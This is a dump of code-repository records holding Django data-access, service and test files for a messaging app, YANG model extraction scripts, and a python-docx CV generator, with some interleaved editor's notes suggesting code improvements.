self.assertEqual(getMessageById(3).id,3)\n self.assertEqual(getMessageById(4).id,4)\n\n def test_updateMessage(self):\n modified_textMessage = {\"id\":1,\"type\":1,\"content_id\":5}\n modified_voiceMessage = {\"id\":2,\"type\":2,\"content_id\":6}\n modified_pictureMessage = {\"id\":3,\"type\":3,\"content_id\":7}\n modified_locationMessage = {\"id\":4,\"type\":4,\"content_id\":8}\n updateMessage(**modified_textMessage)\n updateMessage(**modified_voiceMessage)\n updateMessage(**modified_locationMessage)\n updateMessage(**modified_pictureMessage)\n self.assertEqual(getMessageById(1).content_id,5)\n self.assertEqual(getMessageById(2).content_id,6)\n self.assertEqual(getMessageById(3).content_id,7)\n self.assertEqual(getMessageById(4).content_id,8)\n\n def test_deleteMessage(self):\n deleteMessage(1)\n deleteMessage(2)\n deleteMessage(3)\n deleteMessage(4)\n self.assertEqual(len(Message.objects.filter(id=1)), 0)\n self.assertEqual(len(Message.objects.filter(id=2)), 0)\n self.assertEqual(len(Message.objects.filter(id=3)), 0)\n self.assertEqual(len(Message.objects.filter(id=4)), 0)\n\n def test_getMessageByContentId(self):\n self.assertEqual(getMessageByContentId(1)[0].id,1)\n self.assertEqual(getMessageByContentId(2)[0].id,2)\n self.assertEqual(getMessageByContentId(3)[0].id,3)\n self.assertEqual(getMessageByContentId(4)[0].id,4)\n"
},
{
"alpha_fraction": 0.6588366627693176,
"alphanum_fraction": 0.6711409687995911,
"avg_line_length": 20.780487060546875,
"blob_id": "9d85556f36b224eea546bb9930daede9b6e8b6e0",
"content_id": "afd8d703c87ac19d0533133af95563f0dae46183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 41,
"path": "/zzc/adam2014/Service/BottlePictureService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import BottlePicture\nfrom adam2014.DAO import BottlePictureDAO\nfrom django.db import IntegrityError, transaction\nimport random\n\ndef newBottlePicture(**BottlePicture):\n try:\n b = BottlePictureDAO.insertBottlePicture(**BottlePicture)\n except:\n return \"error\"\n return b\n\ndef deleteBottlePicture(id):\n try:\n BottlePictureDAO.deleteBottlePicture(id)\n except:\n return \"error\"\n return 'success'\n\ndef getBottlePicture():\n b = None\n ##定义捡漂流瓶的原则\n maxid = BottlePictureDAO.maxId()\n ##这里加一个随机函数 获得随机id\n id = random.randint(0,maxid)\n try:\n b = BottlePictureDAO.getBottlePictureById(id)\n b.usedTimes += 1\n b.save()\n except:\n pass\n return b\n\n"
},
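Editor's note: getBottlePicture above draws a random id from range(0, maxId()), so ids of deleted bottles come up empty and the except swallows the miss. A sketch of an alternative that only ever selects existing rows, using Django's random ordering (order_by('?') can be slow on large tables, which is a deliberate trade-off here); the function name is illustrative.

```python
from adam2014.models import BottlePicture


def get_random_bottle_picture():
    # order_by('?') asks the database for a random ordering, so gaps in the
    # id sequence no longer matter; first() returns None on an empty table.
    bottle = BottlePicture.objects.order_by('?').first()
    if bottle is not None:
        bottle.usedTimes += 1
        bottle.save()
    return bottle
```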
{
"alpha_fraction": 0.691208004951477,
"alphanum_fraction": 0.7040743231773376,
"avg_line_length": 27.571428298950195,
"blob_id": "b56ad1d24a9662f7520534e464531b567d9f3a29",
"content_id": "f29c2e98838dfcbe55222600d4098254611c49c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1407,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 49,
"path": "/zzc/adam2014/Service/FriendRelationService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import FriendRelation\nfrom adam2014.DAO import FriendRelationDAO\nfrom django.db import IntegrityError, transaction\n\n\ndef newFriendRelation(**friendRelation):\n # 双向添加\n try:\n fr1 = FriendRelationDAO.insertFriendRelation(**friendRelation)\n friendRelation1 = friendRelation\n user_from_id = friendRelation1['user_from_id']\n friendRelation1['user_from_id']=friendRelation1['user_to_id']\n friendRelation1['user_to_id']=user_from_id\n fr2 = FriendRelationDAO.insertFriendRelation(**friendRelation1)\n except:\n return \"error\"\n return fr1\n\ndef deleteFriendRelation(user_from_id,user_to_id):\n try:\n FriendRelationDAO.deleteFriendRelation(user_from_id,user_to_id)\n FriendRelationDAO.deleteFriendRelation(user_to_id,user_from_id)\n except:\n return \"error\"\n return 'success'\n\ndef updateFriendRelation(**friendRelation):\n try:\n FriendRelationDAO.updateFriendRelation(**friendRelation)\n except:\n return 'error'\n return 'success'\n\ndef getFriendRelationByCondition(user_from_id,user_to_id):\n Fr = None\n try:\n Fr = FriendRelationDAO.getFriendRelationByCondition(user_from_id,user_to_id)\n except:\n pass\n return Fr"
},
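Editor's note: newFriendRelation above inserts two rows (one per direction) but imports `transaction` without using it, so a failure on the second insert leaves a one-way friendship behind. A minimal sketch of the same double insert wrapped in an atomic block, so both rows commit or neither does; field names follow the service above, the function name is illustrative.

```python
from django.db import transaction

from adam2014.DAO import FriendRelationDAO


def new_friend_relation_atomic(**friend_relation):
    # Build the reversed direction without mutating the caller's dict.
    reverse = dict(friend_relation)
    reverse['user_from_id'], reverse['user_to_id'] = (
        friend_relation['user_to_id'], friend_relation['user_from_id'])
    try:
        with transaction.atomic():
            fr1 = FriendRelationDAO.insertFriendRelation(**friend_relation)
            FriendRelationDAO.insertFriendRelation(**reverse)
    except Exception:
        return "error"
    return fr1
```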
{
"alpha_fraction": 0.7089678645133972,
"alphanum_fraction": 0.7157360315322876,
"avg_line_length": 25.244443893432617,
"blob_id": "fdadf9a9a2823014c0813c94c16db7aac9b3c9b9",
"content_id": "864182a8a03d55a23d4a5cd1c31f45fdc4100b4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1206,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 45,
"path": "/zzc/adam2014/DAO/AddFriendDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import AddFriend\n# class AddFriend(models.Model):\n# user_from = models.ForeignKey(User)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n\n\ndef insertAddFriend(**addFriend):\n a = AddFriend.objects.create(**addFriend)\n return a\n\n\ndef deleteAddFriend(id):\n AddFriend.objects.get(id=id).delete()\n\ndef getAddFriendById(id):\n return AddFriend.objects.get(id=id)\n\ndef getAddFriendByuser_to_id(user_to_id):\n return AddFriend.objects.filter(user_to_id=user_to_id)\n\ndef getAddFriendByuser_from_id(user_from_id):\n return AddFriend.objects.filter(user_from_id=user_from_id)\n\ndef getAddFriendByuser_from_idAnduser_to_id(user_from_id,user_to_id):\n return AddFriend.objects.get(user_from_id=user_from_id,user_to_id=user_to_id)\n\n\ndef updateAddFriend(**kw):\n AddFriend.objects.filter(id=kw['id']).update(**kw)\n\n\n# 传入user_to_id 和 user_from_id, 判断二者是否为好友\ndef isFriend(**kw):\n return AddFriend.objects.get(user_to_id=kw['user_to_id'], user_from_id=kw['user_from_id'])\n\n"
},
{
"alpha_fraction": 0.6353510618209839,
"alphanum_fraction": 0.6668280959129333,
"avg_line_length": 36.563636779785156,
"blob_id": "ddc9db44617c0534ef8adcb11a8748fbe7d67a53",
"content_id": "58087292dffe5daa6a8a646ff69424a253d4e1eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2065,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 55,
"path": "/zzc/adam2014/AllTest/DAOTest/testVoiceMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.VoiceMessageDAO import *\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import VoiceMessage\nfrom adam2014.models import Message\nfrom adam2014.models import User\nimport datetime\n\nclass VoiceMessageTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.message1 = {\"id\":1,\"time\":str(self.time),\"type\":3,\"content_id\":1}\n self.Voicemessage1 = {\"id\":1,\"content\":\"I am a voice message \",\"message_id\":1}\n self.message2 = {\"id\":2,\"time\":str(self.time),\"type\":3,\"content_id\":2}\n self.Voicemessage2 = {\"id\":2,\"content\":\"I am a voice message \",\"message_id\":2}\n self.message3 = {\"id\":3,\"time\":str(self.time),\"type\":3,\"content_id\":3}\n self.Voicemessage3 = {\"id\":3,\"content\":\"I am a voice message \",\"message_id\":3}\n\n Message.objects.create(**self.message1)\n Message.objects.create(**self.message2)\n Message.objects.create(**self.message3)\n\n VoiceMessage.objects.create(**self.Voicemessage1)\n VoiceMessage.objects.create(**self.Voicemessage2)\n VoiceMessage.objects.create(**self.Voicemessage3)\n\n def testInsertVoiceMessage(self):\n VoiceMessage4 = {\"id\":4,\"content\":\"I am a vioce message\"}\n VoiceMessage = insertVoiceMessage(**VoiceMessage4)\n message4 = {\"id\":4,\"time\":str(self.time),\"type\":3,\"content_id\":VoiceMessage.id}\n print(\"testInsertMessage before:\")\n message = insertMessage(**message4)\n print(Message.objects.all())\n VoiceMessage.id = message.id\n\n VoiceMessage.save()\n\n self.assertEqual(getVoiceMessageById(4).id,4)\n\n\n def testGetVoiceMessageById(self):\n self.assertEqual(getVoiceMessageById(1).id,1)\n self.assertEqual(getVoiceMessageById(2).id,2)\n\n\n\n def testDeleteVoiceMessage(self):\n deleteVoiceMessage(1)\n deleteVoiceMessage(2)\n deleteVoiceMessage(3)\n print(\"testDeleteVoiceMessage:3\")\n print(VoiceMessage.objects.all())"
},
{
"alpha_fraction": 0.5311039090156555,
"alphanum_fraction": 0.5961884260177612,
"avg_line_length": 45.349998474121094,
"blob_id": "a7b0e262c8b9a6b1c3c2eb85ff0567e2f8251da1",
"content_id": "936efb42e5cbb0021aacca692e611eec212cb63d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2781,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 60,
"path": "/zzc/adam2014/DAO/JoinDAO/FriendRelationListViewDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.JoinModels import FriendRelationListView\nfrom django.db import connection\n\ndef getFriendRelationListView(user_from_id):\n sql = \"select adam2014_friendrelation.id,adam2014_friendrelation.inBlackList,\" \\\n \"adam2014_friendrelation.top,adam2014_friendrelation.remark,adam2014_friendrelation.time,adam2014_user.id,\" \\\n \"adam2014_user.nickname,adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code,\" \\\n \"adam2014_user.photo,adam2014_user.phone\"\\\n \" from adam2014_friendrelation,adam2014_user \" \\\n \"where adam2014_friendrelation.user_from_id = %s and adam2014_user.id = adam2014_friendrelation.user_from_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_from_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n Frs= []\n i = 0\n for i in range(len(row)):\n Frs.append(FriendRelationListView.FriendRelationListView(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8]),str(row[i][9]),\n str(row[i][10]),str(row[i][11])))\n i+=1\n return Frs\n\n\ndef getAfriendRelationView(user_from_id,user_to_id):\n sql = \"select adam2014_friendrelation.id,adam2014_friendrelation.inBlackList,\" \\\n \"adam2014_friendrelation.top,adam2014_friendrelation.remark,adam2014_friendrelation.time,adam2014_user.id,\" \\\n \"adam2014_user.nickname,adam2014_user.longitude,adam2014_user.latitude,adam2014_user.code,\" \\\n \"adam2014_user.photo,adam2014_user.phone\"\\\n \" from adam2014_friendrelation,adam2014_user \" \\\n \"where adam2014_friendrelation.user_from_id = (%s) and adam2014_friendrelation.user_to_id = (%s) and adam2014_user.id = adam2014_friendrelation.user_from_id ;\"\n\n cursor = connection.cursor()\n cursor.execute(sql,[user_from_id,user_to_id])\n #row = cursor.fetchone()\n row = cursor.fetchall()\n\n Frs= []\n i = 0\n for i in range(len(row)):\n Frs.append(FriendRelationListView.FriendRelationListView(str(row[i][0]),str(row[i][1]),\n str(row[i][2]),str(row[i][3]),str(row[i][4]),str(row[i][5]),\n str(row[i][6]),str(row[i][7]),str(row[i][8]),str(row[i][9]),\n str(row[i][10]),str(row[i][11])))\n i+=1\n return Frs\n\n#getAfriendRelationView(13,2)[0].printout()\n"
}
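Editor's note: the DAO above maps raw-SQL result tuples to view objects by position (row[i][0] ... row[i][11]), which silently breaks if the column list changes. A sketch of the "dictfetchall" helper documented in the Django docs, which keys each row by column name instead; the usage line is illustrative.

```python
def dictfetchall(cursor):
    """Return all rows from a cursor as a list of dicts keyed by column name."""
    columns = [col[0] for col in cursor.description]
    return [dict(zip(columns, row)) for row in cursor.fetchall()]


# After cursor.execute(sql, [user_from_id]):
#     for row in dictfetchall(cursor):
#         print(row['nickname'], row['remark'])
```

Keying by name also makes it trivial to feed the rows into json.dumps without going through an intermediate view class.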
] | 62 |
earies/yang-tools | https://github.com/earies/yang-tools | 904f1134c3cef9055cb469a0347cfaca1b4d2af4 | 7a3428d8ba7876403aacc3d013d45e5ab713cc21 | 27a813d5e1288e88034c49ea34c2454e8e93929d | refs/heads/master | 2020-12-11T09:03:32.876079 | 2016-04-04T00:58:22 | 2016-04-04T00:58:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.78125,
"alphanum_fraction": 0.78125,
"avg_line_length": 15,
"blob_id": "bdaa04c5605f4493cf5b1b91e5a7404af080210b",
"content_id": "3bb9716973c959297cca7991a4e22db7eff39712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 2,
"path": "/README.md",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "# yang\nyang model related works\n"
},
{
"alpha_fraction": 0.519706666469574,
"alphanum_fraction": 0.5226855874061584,
"avg_line_length": 33.63492202758789,
"blob_id": "8377dc7c8373e16d15788e176cab5a2901afb049",
"content_id": "adfd88ccfda8c34d1d6727576f8820fd1289a18b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4364,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 126,
"path": "/extractor/ietf95-hackathon/scripts/extractor.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport argparse\nimport json\nimport logging\nimport os\n\nFORMAT = '%(asctime)-15s %(levelname)s %(filename)s %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\nparser = argparse.ArgumentParser(\n description='Extracts the typedef, identity, and grouping from a YANG model')\nparser.add_argument('source', type=str,\n help='The URL or filename of the YANG model')\nparser.add_argument('--src_dir', default='.', type=str,\n help='Optional: directory where to find the source model')\nparser.add_argument('--dst_dir', default='.', type=str,\n help='Optional: directory where to output the extracted data')\nparser.add_argument('--yang_type', default='all',\n help='Optional flag that determines what to extract (typedef, identity, grouping)')\nargs = parser.parse_args()\n\nclass YangTypeParser(object):\n def __init__(self, source, src_dir, dst_dir,\n yang_type):\n self.src_dir = src_dir\n self.input_file = os.path.join(src_dir, source)\n self.dst_dir = dst_dir\n self.yang_type = yang_type\n\n def get_typename(self, yang_type, line):\n name = line.split('{')[0].strip()\n name = name.lstrip(yang_type)\n name = name.lstrip()\n return(name)\n\n def extract_type(self, yang_type):\n fh = open(self.input_file)\n buf = fh.readlines()\n fh.close()\n\n start_flag = False\n title_flag = False\n nbrac = 0\n\n result = {}\n result['types'] = {}\n\n for line in buf:\n if start_flag is False:\n spos = line.find(yang_type)\n if spos >= 0 and spos < 5:\n start_flag = True\n title_flag = True\n\n if start_flag is True:\n if title_flag is True:\n type_name = self.get_typename(yang_type, line)\n if not result['types'].get(type_name):\n result['types'][type_name] = {}\n result['types'][type_name]['module'] = os.path.basename(self.input_file)\n result['types'][type_name]['type'] = yang_type\n data = []\n title_flag = False\n\n data.append(line)\n\n spos = line.find('{')\n if spos >= 0:\n nbrac = nbrac + 1\n\n spos = line.find('}')\n if spos >= 0:\n nbrac = nbrac - 1\n\n if nbrac == 0:\n result['types'][type_name]['data'] = ''.join(data)\n start_flag = False\n return(result)\n\n\n def write_json(self, edata):\n for type_name in edata['types']:\n result = {}\n result['module'] = {}\n yang_type = edata['types'][type_name]['type']\n module = edata['types'][type_name]['module']\n data = edata['types'][type_name]['data']\n\n result['module'][module] = {}\n result['module'][module][type_name] = {}\n result['module'][module][type_name]['type'] = yang_type\n result['module'][module][type_name]['data'] = data\n if not os.path.exists(self.dst_dir):\n os.makedirs(self.dst_dir)\n output_file = os.path.join(self.dst_dir, yang_type + '-' + type_name + '.json')\n if os.path.exists(output_file):\n logger.warning('file exists: %s (duplicate type: %s)', output_file, type_name)\n fh = open(output_file)\n file_exist = json.loads(fh.read())\n key = file_exist['module'].keys()[0]\n result['module'][key] = file_exist['module'][key]\n fh.close()\n output_json = json.dumps(result, indent=4)\n fh = open(output_file, 'w')\n fh.write(output_json)\n fh.close()\n\n\n def extract(self):\n if self.yang_type == 'all':\n for ytype in ['typedef', 'grouping', 'identity']:\n res = self.extract_type(ytype)\n self.write_json(res)\n else:\n res = self.extract_type(self.yang_type)\n self.write_json(res)\n\ndef main():\n yp = YangTypeParser(args.source, args.src_dir, args.dst_dir, args.yang_type)\n yp.extract()\n\n\nif __name__ == '__main__':\n main()\n"
},
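Editor's note: get_typename above strips the leading keyword with str.lstrip(yang_type), but lstrip removes a *set of characters*, not a prefix; it only works here because the space after the keyword stops the stripping. A self-contained sketch of a prefix-safe variant (pure standard library, same signature as the method above minus self):

```python
def get_typename(yang_type, line):
    # Take everything before the opening brace, then drop the keyword
    # as a literal prefix rather than as a character set.
    name = line.split('{')[0].strip()
    if name.startswith(yang_type):
        name = name[len(yang_type):]
    return name.strip()


assert get_typename('typedef', 'typedef percentage {') == 'percentage'
assert get_typename('grouping', 'grouping port-params {') == 'port-params'
```

On Python 3.9+ the slice could be replaced with str.removeprefix, which expresses the intent directly.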
{
"alpha_fraction": 0.5926605463027954,
"alphanum_fraction": 0.5975534915924072,
"avg_line_length": 29.560747146606445,
"blob_id": "b0441abdcc6cad2626e8548ceb859101012be70e",
"content_id": "924be643d887822afd3074631445d9621ee25c3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3270,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 107,
"path": "/extractor/extractor.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport argparse\nimport os.path\nimport sys\n\n__author__ = 'Jie Dong, Tianran Zhou'\n__copyright__ = \"Copyright(c) 2015, Huawei Technologies\"\n__license__ = \"New-style BSD\"\n__email__ = \"[email protected], [email protected]\"\n__version__ = \"1.0\"\n\ndef get_name(type, head):\n\tname = head\n\tname = name.strip()\n\tname = name.lstrip(type)\n\tname = name.rstrip(' {')\n\tname = name.lstrip()\n\tprint(name)\n\treturn name\n\n\t\ndef extract_type(input_file, dst_path, dst_file, type, mode):\n\t\n\tfinput=open(input_file, \"r\")\n\talllines=finput.readlines()\n\tfinput.close();\n\tfoutput = 0\n\t\n\tdst_flag = True\n\tif dst_file.strip() == 'separate':\n\t\tdst_flag = False\n\t\n\t\n\tif dst_flag == True:\n\t\toutput_file = dst_path + dst_file\n\t\tif mode == True:\n\t\t\tfoutput = open(output_file, 'w')\n\t\telse:\n\t\t\tfoutput = open(output_file, 'a')\t\t\n \t\n\tstart_flag = False\n\ttitle_flag = False\n\tnbrac = 0\n\t\n\tfor eachline in alllines:\n\t\tif start_flag == False:\n\t\t\tspos = eachline.find(type,)\n\t\t\tif spos >= 0 and spos < 5:\n\t\t\t\tstart_flag = True\n\t\t\t\ttitle_flag = True\n\t\t\t \n\t\tif start_flag == True:\n\t\t\tif title_flag == True:\n\t\t\t\tif dst_flag == False:\n\t\t\t\t\toutput_file = dst_path + type + '-' + get_name(type,eachline) +'.txt'\n\t\t\t\t\tfoutput = open(output_file, \"w\")\n\t\t\t\t\t\n\t\t\t\ttitle_flag = False\n\t\t\t\t\n\t\t\tfoutput.writelines(eachline)\n\t\t\t\n\t\t\tspos = eachline.find('{',)\n\t\t\tif spos >= 0:\n\t\t\t\tnbrac = nbrac + 1\n\t\t\t\t\n\t\t\tspos = eachline.find('}',)\n\t\t\tif spos >= 0:\n\t\t\t\tnbrac = nbrac - 1\n\t\t\t\t\n\t\t\tif nbrac == 0:\n\t\t\t\tstart_flag = False\n\t\t\t\tfoutput.writelines('\\n')\n\t\t\t\tif dst_flag == False:\n\t\t\t\t\tfoutput.close\n\t\n\tif dst_flag == True:\n\t\tfoutput.close\n\n\t\ndef extract(src_path, src_file, dst_path, dst_file, type, debug):\n\tinput_file = src_path + src_file\n\t\n\tif type == 'all':\n\t\textract_type(input_file,dst_path, dst_file, 'typedef', True)\n\t\textract_type(input_file,dst_path, dst_file, 'grouping', False)\n\t\textract_type(input_file,dst_path, dst_file, 'identity', False)\n\telse:\n\t\textract_type(input_file,dst_path, dst_file, type, True)\t\n\nif __name__ == \"__main__\":\n \"\"\"\n Command line utility\n \"\"\"\n parser = argparse.ArgumentParser(description='Extracts the typedef, identity, and grouping from a YANG model')\n parser.add_argument(\"source\", help=\"The URL or file name of the YANG model to extract info from\")\n parser.add_argument(\"--srcdir\", default='./', help=\"Optional: directory where to find the source text; \"\n \"default is './'\")\n parser.add_argument(\"--dstdir\", default='./', help=\"Optional: directory where to put the extracted yang info; \"\n \"default is './'\")\n parser.add_argument(\"--dstfile\",default='separate', help=\"Optional: file to append the extracted information; \"\n \"default is 'separate file for each component'\")\n parser.add_argument(\"--type\", default= 'all', help=\"Optional flag that determines what to extract (typedef, identity, or grouping); \"\n \"default is 'all'\")\n parser.add_argument(\"--debug\", type=int, default=0, help=\"Optional: debug level\")\n args = parser.parse_args()\n \n extracted_info = extract (args.srcdir, args.source, args.dstdir, args.dstfile, args.type, args.debug)\n"
},
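Editor's note: both extractors find the end of a YANG statement by counting '{' and '}' occurrences per line. A self-contained sketch of the same depth-counting idea applied to a whole string, shown so the algorithm can be unit-tested in isolation (a brace inside a quoted description string would still throw the count off, in this sketch as in the scripts):

```python
def block_at(text, start):
    """Return text[start:end] covering one balanced {...} block."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == '{':
            depth += 1
        elif text[i] == '}':
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    raise ValueError('unbalanced braces')


print(block_at('typedef t { type string { length "1..8"; } }', 10))
# { type string { length "1..8"; } }
```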
{
"alpha_fraction": 0.5963541865348816,
"alphanum_fraction": 0.5963541865348816,
"avg_line_length": 32.39130401611328,
"blob_id": "d7be998c9935a10af5406379ec5f7ecb0bebf0c0",
"content_id": "1922588537684ae9493dad181d168d2b82efb1b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 768,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 23,
"path": "/extractor/ietf95-hackathon/scripts/wrapper.py",
"repo_name": "earies/yang-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(\n description='Wrapper script to run analysis on YANG modules')\nparser.add_argument('--debug', type=bool, default=False,\n help='Optional: Toggle debugging')\nargs = parser.parse_args()\n\ndef main():\n files = os.listdir('../models')\n for i in files:\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type typedef ' + i\n os.popen(cmd).read()\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type grouping ' + i\n os.popen(cmd).read()\n cmd = './extractor.py --src_dir ../models/ --dst_dir ../output/ --yang_type identity ' + i\n os.popen(cmd).read()\n\nif __name__ == '__main__':\n main()\n"
}
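Editor's note: wrapper.py shells out via os.popen, which discards the exit code of each extractor run. A sketch of the same loop on Python 3 using subprocess.run, which raises on failure; the paths and flags are copied from the script above, and the inner loop replaces the three near-identical command strings.

```python
import os
import subprocess

for name in os.listdir('../models'):
    for yang_type in ('typedef', 'grouping', 'identity'):
        # check=True turns a non-zero exit code into CalledProcessError,
        # so a failing extraction stops the batch instead of passing silently.
        subprocess.run(
            ['./extractor.py', '--src_dir', '../models/',
             '--dst_dir', '../output/', '--yang_type', yang_type, name],
            check=True)
```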
] | 4 |
angelo-inexa/python-cv-maker-project | https://github.com/angelo-inexa/python-cv-maker-project | 2277834b94f46856589338ae9e5715b3287751d5 | 23d090bf4f4afff1a3aa4ae6ead8a74a997823d9 | 6b654b14ddeb72db0ce89d3d54f1ddf44f9b392b | refs/heads/main | 2023-06-04T06:01:40.609288 | 2021-06-24T11:52:54 | 2021-06-24T11:52:54 | 379,907,284 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.7981651425361633,
"avg_line_length": 35.33333206176758,
"blob_id": "c250224f87ca489ba8214161b26eb531846d3f5c",
"content_id": "f4a6557c403ca7dc2a8038c9e931f7372448ec1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 6,
"path": "/README.md",
"repo_name": "angelo-inexa/python-cv-maker-project",
"src_encoding": "UTF-8",
"text": "# python cv maker project\n\n## Installation\nrun following command : `python install -r requirements.txt\n\n\n"
},
{
"alpha_fraction": 0.650597095489502,
"alphanum_fraction": 0.6532507538795471,
"avg_line_length": 24.404495239257812,
"blob_id": "9a64c390df771f9eca112a9dd4d3fc1e0f313c00",
"content_id": "b2439d598c2090462a5b28c44e4287621766db6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2261,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 89,
"path": "/my_app.py",
"repo_name": "angelo-inexa/python-cv-maker-project",
"src_encoding": "UTF-8",
"text": "from docx import Document\nfrom docx.shared import Inches\nimport pyttsx3\n\ndef speak(text):\n pyttsx3.speak(text)\n\n\ndocument = Document()\n\n#add profile picture to cv document\ndocument.add_picture(\n 'profile.jpg', \n width=Inches(2.0)\n)\n\n#get info from user\nname = input('Enter Your name? ')\nspeak('Hello '+ name + 'How are you today')\n\nspeak('what is your phone number? ')\nphone_number = input('what is your phone number? ')\nspeak('what is your phone email? ')\nemail = input('what is your email? ')\n\n#add text info to document\ndocument.add_paragraph(\n name + ' | ' + phone_number + ' | ' + email\n)\n\n# add heading to document\ndocument.add_heading('About Me')\ndocument.add_paragraph(\n input('Tell me about yourself ')\n)\n\n# add work experience \ndocument.add_heading('Work experience')\np = document.add_paragraph()\n\ncompany = input('Enter Company ') \nfrom_date = input('From date ')\nto_date = input('to date ')\n\np.add_run(company+ ' ').bold = True\np.add_run(from_date +'-' + to_date + '\\n').italic = True\nexperience_details = input('Describe Your experience at '+ company)\np.add_run(experience_details)\n\n# add more experience \nwhile True:\n has_more = input('Do you have more experiences? Y/N: ')\n if has_more.lower() == 'yes':\n p = document.add_paragraph()\n\n company = input('Enter Company ') \n from_date = input('From date ')\n to_date = input('to date ')\n\n p.add_run(company+ ' ').bold = True\n p.add_run(from_date +'-' + to_date + '\\n').italic = True\n experience_details = input('Describe Your experience at '+ company+' ')\n p.add_run(experience_details)\n \n else:\n break\n\n# add skills \ndocument.add_heading('Skills')\nskill = input('Enter one of your skills')\np = document.add_paragraph(skill)\np.style = 'List Bullet'\n\nwhile True:\n has_more = input('Do you have more skills? Y/N')\n if has_more.lower() == 'yes':\n skill = input('Enter one of your skills')\n p = document.add_paragraph(skill)\n p.style = 'List Bullet'\n \n else:\n break\n\n# footer\nsection = document.sections[0]\nfooter = section.footer\np = footer.paragraphs[0]\np.text = \"CV generated using Python in collaboration with amigoscode and Institut QuickBooks\"\ndocument.save('cv.docx') "
}
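Editor's note: the experience prompts above are duplicated between the first block and the "more experiences" loop. A sketch of that block factored into a helper, using the same python-docx calls (Document, add_heading, add_paragraph, add_run) as the script; the helper name is illustrative.

```python
from docx import Document


def add_experience(document):
    # One work-experience entry: bold company, italic date range, details.
    p = document.add_paragraph()
    company = input('Enter Company ')
    from_date = input('From date ')
    to_date = input('to date ')
    p.add_run(company + ' ').bold = True
    p.add_run(from_date + '-' + to_date + '\n').italic = True
    p.add_run(input('Describe your experience at ' + company + ' '))


document = Document()
document.add_heading('Work experience')
add_experience(document)
while input('Do you have more experiences? Y/N: ').lower() in ('y', 'yes'):
    add_experience(document)
document.save('cv.docx')
```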
] | 2 |
